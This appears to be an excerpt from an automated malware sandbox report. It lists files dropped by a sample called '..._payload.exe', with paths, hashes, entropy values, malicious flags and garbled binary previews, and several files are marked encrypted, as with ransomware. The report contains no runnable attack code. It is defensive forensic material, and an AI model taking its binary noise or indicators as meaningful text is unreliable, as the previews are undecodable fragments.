                                                                                                      Preview:<svg "..d.N\...QH....$..[....[5I.&?.. ..........BC.G/y.A.....6_..........v.Z.GI..Kl.77.....D..U.]A..\..We..n....W....W...Mh.:$..o6.Q.c.....%.q...j........g.8.i...]...=.X..,..^..@l..'...g.?.2...b...1B.}k.W.g....#......u.Y.7.;H..I..tl.."S.v/...{.,.:A...L..........q...k..o............E...>...R;.b..R..5..K......&b2t.$n..).........L..`.8;|k.....R.=9..]............o.[-2|...`$.R%..d.....}?Wi.......X#?...\.D.)+..fXA...t.g]....]G?.....U.y.Q...<i.!......YSx..l..U%\..,...9.,o'. 'h@3.......}.,.......%..Bs.J$.)n.7.uE...c.nh.%.-..Ht. .y.{.cj....'...L.Jv.....Z.....$....2.=...7u..@c.7XRt"..'.&.Z...z./Wj......`.M:T.....n.......`,kQ....mG...;(.8 .@..m%...._=..=...?.0..T9..t.a.s........W......q.......W.[GF...@.sl57>W.9.H.P...Q.L.=...(r......<.....\..c'....L.q.E...^xF..s.(...q...E......?D.J..!..H`@L...Z.p.. .GP.mY..!'....qK.U..|'..%...*.q=T.6.nz....L.._..s~..X:.e.=G'....o.~.....2..qn-.&.........>.3J..C....Ac......85*$.........l........B..n.t>..|...{(.

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):149024
                                                                                                      Entropy (8bit):7.998782156691901
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:2uFwN2qB94tNt0bQ0miJU6Ibmy54mZiwnncM10+xnTJ5:Pixf4t8bzmiJI4oiwcMJT7
                                                                                                      MD5:9EFD307A636F097BC449DAE55E219A02
                                                                                                      SHA1:902F4C84B8384C60F068282372673FD39EB24C20
                                                                                                      SHA-256:FB0815F62D0562F4B816935458161A7CC262651CA177B64BC351CAF71FC2B0A4
                                                                                                      SHA-512:740BAFB1775888AA457488E52983B9E4294F30071F52D9343255FA3310F421B00EEB6FD3BBC1E621660FDCB4BA9BB9C551E8F14CA90A5BC23013D7D20800B26F
                                                                                                      Malicious:true
                                                                                                      Preview:{"loc. s`..4....Z.....+...f...E._.....P......p..e`.U.7. .".].......k.u'.........a......$.......Z.eV...G.WN....&..l0...f{9.....E....L+.....a.^f.n.ny....9IY....\ nD.A....(4Mq...R!9..........J.p..re.s....X.....;...v....l....%X...s.u.W..O......0O.....7..#uR'a..iG.7....{n...CP.1...DX..$..ni....F.3.o8...{I.=S`v.b.JD...A.v...&x.?`...!....<.......~...>..4...9....1....0'...,.F._7Z....L...9.mI........C.j.xLO.F....F..`.9gr..%.)J.O.".}........../.qR..f.).Do7....G@.E1.yZ...{...WZ.A...`..5u"...=Yte'0.R..,.-...s....L..Bu.ZD=...Ys.L.FKjhw.[vo..%......~q....{.x..........`=.O.1{(?V\+.J.k.I*........QU.b.iW..?.._.....P.)\.-..j`....>......|.....(|W5.........w.J..}qcyv..*...Y_.....8.".j....o.U.E.xL....i..b#N....8......RZE.z2...E$.-jLv...r.U.&..TW..n....w..>"2be...7...........9.d./.;%="bLp...g."..o.{YO..B....w!.W.a.:.b..0.................2.I$\!...d..=.:V}....'.@N#@^;..\....fI?!..Dh+.j,i....b.....W.~\..x.......*..>.b.Y...+..............ZM........wzj.Z.....

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8526
                                                                                                      Entropy (8bit):7.980219242876387
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:f7FR9jqO+/HHnKsuQnFuuUz1klXHVcfWIdJi4K7o75H+vp:foV/Ks1nFtUpMHVOJi44a5H+vp
                                                                                                      MD5:48729189D2CC084E843A07C3B42610BD
                                                                                                      SHA1:6C77AE7F81E1C9E68F67D929EDAF7B67AC153E6C
                                                                                                      SHA-256:A69869BD732A566E258D5FFCF09D78B0A7C07E95EB9E0D21D6822975D9E34F9E
                                                                                                      SHA-512:EF1DB41235A5CB5DF0600E84DEE71F3EA06F5F33DCD4467FEDA21AFE267363A6CABDA0F0B2714E6E7EC7A110DFECCE673797B41D1327E395E4DC2DE26C60FB36
                                                                                                      Malicious:false
                                                                                                      Preview:regf..4..7....VX..|...............[...J.6...k..&p..S;.Rd...-'YM.r...n.....F.....u......p..KY.&..4.Unn......c.... &.^y&3..}N.F..p..}..'..R....r8..sB.Y..}..C..8....A.e..Z..,$.i.SC..8..j6M.^.;K....v!...j..Tn.x.q]<...?...F....W.../.^..._.UG.gW.=..%.....M...C.......{q. .j.;c..[.....O..[......].:....cXW.......b....S!+.u}.RE.z./S.2....pd..'..l..5.....".np...eZM........./.U:.~Z...8e.w.2..6.~..3hqX([{.tE)Ql@<.J....U..&n..\."=.%...8]...L..c...[......c....y>.d..tK.mc..h........V.*....>P..(.[.}.`.e...d.t.l..].Y4...BR...s..^..>..>u..yP.U...y.6.S....mr&.8fee..8:..l.U....>.......s.<....H4.R.{.{:7.S.h.l.U..a..z.ij.x..T.r$.}^.....$.xk|.q..L......P.......+.....4......i.....P..R..Q....}!..c.C.*...;...W.....gRF.w..xO.........K.@..Xea..8...vg..1..=\1...E...{y.0.....a......w..M^7....g..>..v........x(.-Z..@.......\.1.J....C....l-t...V.u.....|...Iy...%1..S..{.I.5..B"..oO..........ri......QCi...!.c....i...el.."..x._..../\.[#.9 ...4..8t..pY.`..nb+...,qx..R..Z...

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8526
                                                                                                      Entropy (8bit):7.976846836249158
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:leI8ErYaEx96OT/Bc1kVAklhgXgRw+Edin8q+Bz6EGSAtaFIQzwkPS:MEFuYXuEa8qQPGXtHQxPS
                                                                                                      MD5:9E407ACB6DC95E7E7694F57A4803BF2A
                                                                                                      SHA1:E41076B2627AE9F062DA8AE93F720A9CFE4C05F0
                                                                                                      SHA-256:FF760AF014429EDAA6B0CC74B18BC9BC85A7D36CD74D70AF615E2BD6C54696AB
                                                                                                      SHA-512:4311F1D893CC52B24B0C4975FF175219DED0BCBC857C3E1F89B417D3FF35026CFA3AC6AD1EEC9C5B0454A0EB819B4E375E5233D465506FD8BF3E5E60384C972C
                                                                                                      Malicious:false
                                                                                                      Preview:regf..f..+R..q^.x.....A.1v3.....a.>M6.T..?..\u..X.X.....T0Z...,+&D4..h*fl.Z.E......./....G.Fz..T...4t.d......s..1..w3.oXu.\w.?.-6.:.gj....S/4Y3R3.L...b8..L.q.0(..<.jV#....)V.....7.S8P.S.ci.}.7G%.l.1@...).hN.9pm<c...(\(...I'Vo....{PS.x.=Hx....{.L..?.0.=x.r.']...`l.9n..k.......[BIlZ...mn.v3..Uw..3~#HO..ru.E .h.4{...ab...^i.OE.'.=cD...1#.J..`|.f..8..3..".4.).".oC._..e.uAf.....#....D..5.<....n...W.,..,B.R!..,...{...I.Mh8&..a.V....r........9..d.......aT...\...:.<.`...K3q.W~..>-.nX;!A........+B.........,.e..V."\.0.0.E..8.f........)..]..2sRZ..zbTD.Y...o/("A.4....84.'..{.C...}...W{.i4...R.]..@N.^.c.m5-jT.v.....4........@L.k.w7~.. .....w....:........b,...M.......n.H1..m..e....A.-.....i#..p\....{~..{+....%...@.u...FV...ZI....t3.gu.j.}#..RS.,n.......J.L+.@F....X.?....st..#yf.j.;.|....o .5lx....:.t..."..#N.e...s..p.r.<..$|"...f)....B..)w]r[.1A.].../I......).0n1.V....j...#:3.dj.7.....3..m...\U0.....W..J.#.....B..s..l.j.MO.........bP.....y._{.xMte.Bb!.......

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\LogFile_October_3_2023__13_9_20.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):615
                                                                                                      Entropy (8bit):7.6530778666469645
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:tWEncerd+0RuCNiUYcCGImqWmE7GJSU532nHCcUav6cii9a:Yocer00RuHhcFhqNbJS5iYv6bD
                                                                                                      MD5:5AF716B6F55FE66012149C50F629CED1
                                                                                                      SHA1:F1AD00CC206A9BA8B97589B3CF7A44FAF4321199
                                                                                                      SHA-256:EC0F891B7886B244A45AC7F1FDC0F29A731CBC43FB0FABFF1AF5F65679C4528F
                                                                                                      SHA-512:B50F6776B52A9CF76EFA9B1090D5E503DDA09DA85F8FECBD4BECA4ACC4481252FA62675E20CCC90F31142F92B578EF5C024D24C4F03779F0CBB901725880D13D
                                                                                                      Malicious:false
                                                                                                      Preview:[000:..cs.w....~.%...|o..P...m.eR..|T.d#.Q'.W$JM.N./....5..#8}&.|..w....7aF ..n2...z0....4......!....&Ot....X~._5z.4........p:..H..y...".$..H>.v.;.p..5[.....V..Ew"......z|8...;.../G.....E_..K?AQu..".ef.R`q..~.".c....H.\.....p.p.U...%.....W.^J#....\.#h(>..#c.m..hH.E...g.}x..vU...ld;+4.U...%..........kL..*..W.......p.........^.NI.q".1/.H....E..(:.l.P..<..B..j,*d..]6G........x...> .1.s[...[.t..]0".X.,>..#.N......W....%.x.@D!..{*m..:<pJ...FO..~xi._.,r.\..Ojo...U...H.k9F..e.......D4=~..N..i....`....7R..'..phZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8547662
                                                                                                      Entropy (8bit):5.204952859423443
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:49152:ehE38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOm:vF1qd/LKNm
                                                                                                      MD5:3A753EC8900CB18285490242CFC536C5
                                                                                                      SHA1:76DD2DBFCBBA28FBB4D0162E9D8B707725C5E556
                                                                                                      SHA-256:B02259A7A5226670BEB4BF0199171CA7A15324B760310AE92A86AC8F040BF3DC
                                                                                                      SHA-512:A2E0EA8AE06286B3BFDF3F5FB47919003ADCE156CA473490FCC31A48E6E9C71FD93D41B2C7B97C2B08F2BE1C817B61C1FEEB33E06BB0075025BBF7E2C111EE81
                                                                                                      Malicious:false
                                                                                                      Preview:MicroQ7Z..[.G..OK<M.4....2S.*..0H..........)...X...EL.d..6.P.3N...I..4.V.;.0h.r<,|.................{".z...T`.K.F.3..X.M...j..+6.Q.+.F...\=&..d.{-..N.!:..... .(..)[7.......S..>^...n.%..yv...a.Af.....\...(y..M.....|....v.I...Q.uc...%....wI.,@.2....`N..4.p.F..*..x...[...:[.u....d.%_o.}/C}.)L..t.;.ho..'...i.F..-r..S....x......kx^P....;...19...}m`e...R....?."...p"j..Q.....X.Bu...J;.H.s.*.....S.Uq.d.p..p.n....c.sL.e...d.?...~..AQV.v....\..(....@...8.(Q.EIj&.\.d.R....Wo..'. .m..(U.s..1..N..fQ.[.....yX.~...G...w....R........."4....R@....s.....K.dY.N.N.4.....T7..u.....n..;D|G.Q.........,g.R...H..K...n.....cN..3":&c..7ub.N.3........|..:...T.@./.g.r...6'tW.q.1.\....LF..t.-.~.....|.,..~.5~.9.:....d.&..#.5.....b...U..no(.\-..R..(.g.P.{).q......i..Z.M.0....g..b<..u.$..J...FD....u.K...O.E.v.jT.:?e./;~5......r..="N: L.=..........mbi.3fR..;.i.PL)...x...eZ>e..]K...*.c.......G..c...E..4.....^$[%...U9.....?.0.K$.^.......>.g.oxT]...W..W]L.$.*....u..j..sQT....@..g.2

                                                                                                      C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8547662
                                                                                                      Entropy (8bit):5.205028583083512
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:49152:YUEdqyLg38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOH:YUEdqyLGF1qd/LKNH
                                                                                                      MD5:ACE11FEFF283500715523EA4DC23253F
                                                                                                      SHA1:1E601B42A2388E260293E5790006A8771F12F11F
                                                                                                      SHA-256:5F5C4EC0BD9F62B32480618E8ECA38056DB9AB51347EDC5D32B0219B939B7F7D
                                                                                                      SHA-512:233458A1E1C04F8A451FDD5164C1CD0D3CE8B37B44BD5F475274FDEF1C8790DD88ED82C7D027E58E08067378773DC8B25AAAFD92096FBA7FE401DB37BB7585DF
                                                                                                      Malicious:false
                                                                                                      Preview:Micro>...R....m.B.........y;p.._m.j..1fs..+.w.2?.RB..k..}.E..e..4...x...i.)b._..B.........{.4.B.Tm..R.~....?....7*....u..LW.G...L....5.kM..2h...5.....hNva..3...L.esj8:U....s....cJ"s.`.j...s..Q.>.?.[........>&..Lo:K$.e..T..p_...7%T..&....._..L/5/..5..h...<.o........5..q.3..iW.qP.g..'K....XX.....h....L..,.....L4......-.W.I..)..6p8.m.>{E;...`Y.8.k.,......3.~....1...3...Dr.....C.).R....6.o.W...x.*...M.L.LdD.m...u....[.....k,k..!.....e.79..Q..H..{.8...@c...T.F.......g..}[M..~.#.~a^3.....Z....2.OV....Dq...p.wA.U..J....C.....m.FI...k........X..X.....j?..4....DK.Q.(..W.w.C....^~D..7...".B........5..r....z.M.,.1D.j...w$.e...l'.v*\...M|"#._.r..B....Kjo..jz..;.$..\.... y..9I...K|.:Z....t ...C.o$.....(j..+.'..8..G.R..1...A....|2.KS1....G...bA..^..fD...v....t,r.....T...{.3.z.s.|.L....J.....X.L..#Dx..]Q.}.2...q......&..E..).9....y(.R.E.i*...[....[BHd.>.f..t.q.5......E...b.~........H....$......G....~y..N'>w....Yh.uCd..9|/.....^..j....3<B{

                                                                                                      C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1192270
                                                                                                      Entropy (8bit):5.6630163808111655
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:kkEU63ZzTTum/bpN1ZPq7uJQ4aKVmaS4aMz8Pg3lxJo2cvXti:kkEU6pqq1hJBaKVzaYcAqti
                                                                                                      MD5:DDEB6991ED038AA63D3D352CF2F25FFD
                                                                                                      SHA1:D8BC1AC6AD17EB16A8D001F2B56AA46B3C8D61B4
                                                                                                      SHA-256:7EB79587D57A2BA1216D4AB196A1E06F9EEEB532122CDF37F003A2CF1B67038D
                                                                                                      SHA-512:E2BF6E08E081C2D0CE743036BF904B9FABFC9E2C208CC8842C80947AE016656D08E64BFA90C7B694A76DFF7F31325810BC2E3D2FF2519A8392D928FE118B3B96
                                                                                                      Malicious:false
                                                                                                      Preview:Micro...H.;..W.y.:.*,R.H..`.K..IV..5.Wa...|..L.......X.. '|.[.....f.._......K.......a.cWz....t1YK...j.Ag...,ca.3....V."..=C1..........n..m+1.,.z.P...-'..|{....2..m...V...].Z.sc.f..s...uvN...3T.G_&....\....N..W{g.k.....G..5k......<;.V.`k....Q.~.7)'..-........e.g4...7.....UB.3..........K..^...E})..8 .Ig6.........?..I.0..u...{...K....E^.\.f.n;UP.A....x..~^f..W'......>..].....j_....s8.oi.e..q......S..n@y..q....}G....m...D.iW$...h.]..A.N.0.W.8`...1^.Rg.^.u.5H.......zq.N...K.]..v4...7le..f.X'N...3.4...._..,....c?6!..5.....t....?..i..NF...o..L.8.2[.<G..GCb<?E.*.....1....w~0~...QX..y..#....$.......m..c...i....E_.......o..]@.y.Oyu7H..U9 x.H...q`........].c.G......'.u........C.....z._....S..d...h.....r9..1.....N..,.....[..h....c.M.%..|......A.......*.K..Nj.tN>$WQx.Z. %...}T.B.Q..po...........`..XD".Lw@,.....22.N."b...IL.&]Ij..t.":..|.}...H..3c...1\....Fl.......lr.......i..4.>P.a..z.........7.O..h..JG....x"3.5lkt..SG...t.....L.

                                                                                                      C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1192270
                                                                                                      Entropy (8bit):5.661760104719269
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:uy9EfL7FeJQ4aKVmaS4aMz8Pg3lxJo2cvXth:1gLABaKVzaYcAqth
                                                                                                      MD5:0479B20484778CEB4A432DB2F35884F9
                                                                                                      SHA1:C8B6279F372FDE047E7EF3F64F7B411DD854940D
                                                                                                      SHA-256:57578C219AB138D61B664EE3E13F1705146F93384FC3F2EADB4A9A8D3CADFB0C
                                                                                                      SHA-512:9C0DCD65262F466D582447E549FC5165D6ACB4E54A417932ADD1DDE4673AFB385770BC32325FB8373D7855BF1441C86A63C245829FB56857FF2493B45AE83305
                                                                                                      Malicious:false
                                                                                                      Preview:Micro?.g...{......!...Y-.....*W..9...B...%me."j._.._.....].92|..8...0(..R.fA.A.W..Z.a..e~>.....i..N....)...*4VkzR;q^.../.c..Wg....m...L.TL...r.O.....}A....$Xo..2..en.<R3B. 1.........Cvs..p.....r2../...ZM.v8.s.......b.%.g.=@?-@.K..<.~...g!.4...j.;...w0+..^..IO.b.........Y.FK`JM......t.U....@{7{*.L.>....D..r.Y.RTh..R...._......9 n.h.#r.K....h...o..D.c[.....@U.w...u.c!...(PJ.Z........sFq.....3|.WR..X...kF-..J...~.`R.....e.........}.sT...j..1..\....{.`.W..E...v.a.0..p....:s...?j|NB"-....a+S...].# ....4..Cn..V...0......?...../b.K"IO.p4.O.6..~P.1N.. ..M.[.......B...i.o.s.(..P[0.........L,hTh...J.Wz4f*.h~.wQUL.$(..z`B..........3.4..... .../.z.}f.S....f.E...U....)=.-,.....F..B..%.%.$ZK|Uj.._....H27.0.)TDM>&=~w.........=*!**.y........cP4 .....wT^....>.ZM.R..^..........Ts....e!df.v:.g#..W.&.@......h?w.0.r.(u..wT......@..@..V..h.v../..<=d.n..V...#.a6Os\..3G..a..R.....'.e.l^.^2.f.........2..v..`.v..S6.{=3.z.....'...ht...Zh- -.!....".4.K.a....G...'..;.

                                                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):24210
                                                                                                      Entropy (8bit):7.992856443083905
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:39hFwF/bTLeDCS98OOB1vXS9mOiXbwFDhxV3j6jz7h3VLKtRN+7VrkxuH:39TwFDTLrSkdipiyFWjz7h3VLKtH+Brr
                                                                                                      MD5:4A04D73D474978729815C52505C092BF
                                                                                                      SHA1:867660817F3F0630B01BE74B939CF609B2D046DA
                                                                                                      SHA-256:8F21130898760BD816356545F277166453B651085C8EFD865C768A4320A30314
                                                                                                      SHA-512:81F9E8AB0922AEB166DD1A6D945C137C67D69CF45054FCE84351BBF5ACB2D71DD40D60E8BB463EA297B2DB01B04E1FC9599DB9DEE08009EACBDFE23DE3F8770F
                                                                                                      Malicious:true
                                                                                                      Preview:03-10....5..0..u.Ya%..I;.........."..g.8j..(..........8.@..|..d.y...l...C..CB.....).)8@%R....+.Ti..3.b`.h...WI3.~..*%y.W.8(..}.:......./..?,.9..}.A.a?..G..'0.h....*+....zf...!l..(..]^.G~....9...Qi.....^.Bt..6=..x...y..vT........w.G.... .h...0p.~.....h.....ct..Q&........O...F.B.0jxr.H....e...,..........M.Oc....KW.\L.2.$m8Z....f..kN,..{...99iW........r..l.....M...ZC..T...-..+......\.........,..*...i%..j..$=Q..n.#.s.....).....YTC.L..:.....L.....i..I.......4.R .]....(..&........^.._00v^._....6...Z.c<...&.=..3d...L4.!P..~D.....h.*P..'6..G|.....$.B.al.w"p[`........B/._.v.y..=.6oQQM0..........7.v...O@..s(.T.<w....w.w....;.:...M........+.Y...tN1.^..!..j.iX...q.........7C.>E.X..........Y_...g.M...G.|...=.8M4........T.GM........6...e.nw-...[.g.C.J7%/'.....<XWl.e..`.YY..h7..+..C.QJ.....B<y,..X.r...........6K.~.$....ox..7..=.~r..................G/#.....m_.!......Ic.5.*.F.>..<.PS.I..?..K.aC...I.1.">E.6..@..7.S+......h.6......F?....I.$&..F..=q.......M.

                                                                                                      C:\Users\user\AppData\Local\Temp\wctAB5F.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):74525
                                                                                                      Entropy (8bit):7.997429010374617
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:sb64rX1f/IAfj9wEiSVwykIdQaymnY0hsc9YL:shIAf59i8nRPk
                                                                                                      MD5:8C3BC2E6BAF858C6EFC25A58BAB02465
                                                                                                      SHA1:5FE00A623F2B631C5E4B8178BA50AB5024EC356F
                                                                                                      SHA-256:316A5806F064BF5026E7263609E82B5C35F23E12BC1F007C611CE4E01F5941C5
                                                                                                      SHA-512:CE8A5BF39F4F3434BBC1D1CBC1F4630441E5FEF81C14E68473E6DB95C439F8F3C679EA575DB10778E32898FD4DD29A46AFCB1D0B9A14B9422E3A04CC16198228
                                                                                                      Malicious:false
                                                                                                      Preview:{"ram .^..'q._...Jn.hY.y..vPdtr...a.x.V./t.m3\*....[UQe'Tu..X...B..w.I<*.....l`......-h.l4.....x.4..=fHm..vp^....9..3^J..^..|9..7oX.~4...>.r..Y.vl6....J..JV...Jn..a....2..GvuD...3..|6.G..p...z.D9............d.~.^.{W..>.<..meE.KB.Tr...Z..BQ..e.Yk..#.CO.l\.7..G&..CI..d....i......z..pX.f.z.3.@.v.mW..../.?.O...s... ....lN7.x,DdTJ2r.}..Z/AN..U....)...(...L$....O<..ev.../..$)3~P.|..s.4.&...5a....X.eM..9..$...$S..5.~.....".b...@pW.....&<!I.D!...ZO..tR#S..e..(.?...*....Ai..HF.........Z.v..#....L...E......(..9.T......i........%.t.D..Y&..]7.R$;l.B#.FS...C.j....._...M.vb.5kY.....}.2H..S......w$.x.y...R..3..E.....Q)ie..p.>k....kW&.....F.z........k.V......%_..a.R.,....u..d.mq...lk.$k..=w.m....3.......n..S.W..].`.0..l. .A.......&#.{..h............S...........].]_.<.=..g..cV...._}.N....! ......(..0ko.?W._G......~U.zQ..V.m,..g...8.l. ..ec.m:B..Nl}....]M..ca._=n..L... ."p..`|..V..*u3..V.5.;`....z1..bK..f.!.M.g...YQ.9.8.1..W.<...^Z..........!..j24..E..

                                                                                                      C:\Users\user\AppData\Local\Temp\wctDB2E.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65188
                                                                                                      Entropy (8bit):7.9971193199728905
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:j27YHUuGdyx2AJZwhSbcA7gwL4i/hHIsrfFvoeO4F:j27Y0Ldy8BSeKh/hpJo74F
                                                                                                      MD5:0A1E72E18DBAF51F6A3DA986288D8296
                                                                                                      SHA1:BA2BC6D4A1842DB41AB62320210527015DB3EB6D
                                                                                                      SHA-256:A738F754291196BD169E7DE16C5C5F1F3BDFC54B3D7ECD6A103F25C7C1066BE2
                                                                                                      SHA-512:5D6BD79045A07E2572815FEA1E91A8517257D5D33C0667202311B1424786401CC9EE6DD0C5F250CF085615EC03F3A2746B38DBACC317D888353885BB71C8A144
                                                                                                      Malicious:false
                                                                                                      Preview:{"ram..I0..~S........|.......gG%?..%..#X...^..QV1....9...]...@..xh5B.)......7fx4a....[.......]...Fi..$:#A.....o.Vr.z.....Ddv..}.q.H*Up.|LQe.Nt..]XG.U....>..`6]F..6;.....>7...#.Xz..'.D.S....:..".F...,.DT...&..T.t.....a..>....WO.h...*.?.q./y./..Q.HcY.N.Kv..f...........Ut..r[.$..U..1.;.Z.4.(.K5q.)..u.v)=..#.I....Z:)..............#..B,.........M-.(Z).6X~.1..._~.W<|.,...Q..R.....zY.uX....`.y:Yj..o.Z..Z:..~..f.T..=f.....Dql..^LF..u.....L.....FGB...i.w...4..+;V.KD}...%..).....G..@......M....*.`.....<....,6....y.TU."...S....,...(...-.p...... .,M..GO&85:BB#].VO..JM.=f.".B....l.b..$.G.h..SI.).+.j.k....dH"Q.q..........y..KC.k..................>.Zsk..Db..v$p....U..g..1}.3g.;+K&.p.8T....Vc.w...O.|.=.3fG... ..ET.w:....C.UD..'>.. B..m...7..a..Y...cTj...u.b.........*-.!.b.......W*..l......m.....T.Pv.....({S.O.y=..q..}.....F.|.+..1....q........=..:...zu.T....L.V....@1.O.5hb.C/N..}.X."n>o.....K0@..![Q(...KW.Mo.....6gh.I+..S....9.|.yy.og...Q6@.`.\e.

                                                                                                      C:\Users\user\AppData\Local\Temp\wctE4A4.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):74525
                                                                                                      Entropy (8bit):7.997915094299929
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:TOSawp3XKY8K3laKNdoh2qQGRncrI7ihlMFi6jQqvOgNSK+Hh:TznKY8KwKN6h2DGRkI9FiIjSHh
                                                                                                      MD5:0EDB1E73ED353587FC10B9A591D00412
                                                                                                      SHA1:D3919A01DF388C5D7DFF8D25AE9C80A6E80FA3F5
                                                                                                      SHA-256:BCDCE0C57D5C50C6FE24BCE19F6810A540FC10B3A1011556D8C76635CA89B46C
                                                                                                      SHA-512:0D65B29A33A2A1CD14051E8853DF7A74F0C670BC39B10E9172426BB4B5179373ACC2FB1DE3D1D37E41FCE03CB6F5CEC67BAB1AA69204FFF5983BB71E6C3AF6AA
                                                                                                      Malicious:false
                                                                                                      Preview:{"ram(.."d.T....sE..q9....A..R.,...wC.e.+...B..*}..zd.L4.H.......s.S.~.9......|u.......TK..S...TV.C.....C1[{.......S.."~......0.d"........,.V..!.[D...2......l%....M..\..%.*.....4.b.....*..D..oT..@.|.b.. .2.y..kk...4....t8..T.~....G.a.r.Q..\.j|v..y.....Q..*.z8e9#.f5.....D.k3c..U.~.<.J..V.M.V...h.-.h....0.|.T...*...;.....tA...@...6..@.\...0..bt.X.z.W_C0..^.{.K...i7.EPb.=...(.G.......1.....89.*..D..J..P.k..........~.{%..7......9...*.$:.h...d......D.4.$_y.B.p.b*..s...x5...~`.70\...%..j8.E.' !.T"^..%......//.....h...oT.m..s...z.n.e~.k..*.xY@U..$.;....cLz........4.|.S..W..j9.}R(ph.3{...G..;e......2M...H.L.W..E.......'...'V0........$[.2]....h..-".E.B.l.<.......k.9.U..H2....j...K...Q...X;.@?.D .t......x.+.g5%`. ..<p.#h.....[..z.W..n.d...E..=/iW.63P.H.A.P!.y....`p......}.e.B..h........h.?..F&@h......{.!&.?.)...l;....h..*......L.Y.L ..;l.q..g>.....r.<...D..9cI....Yl...'.).[V3.h..n...4n.D...{.1L...]..h<......=.#Y.h.9..k.@Z.9......~N....F..%7

                                                                                                      C:\Users\user\AppData\Local\Temp\wctEA40.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):74540
                                                                                                      Entropy (8bit):7.9977131511576856
                                                                                                      Encrypted:true
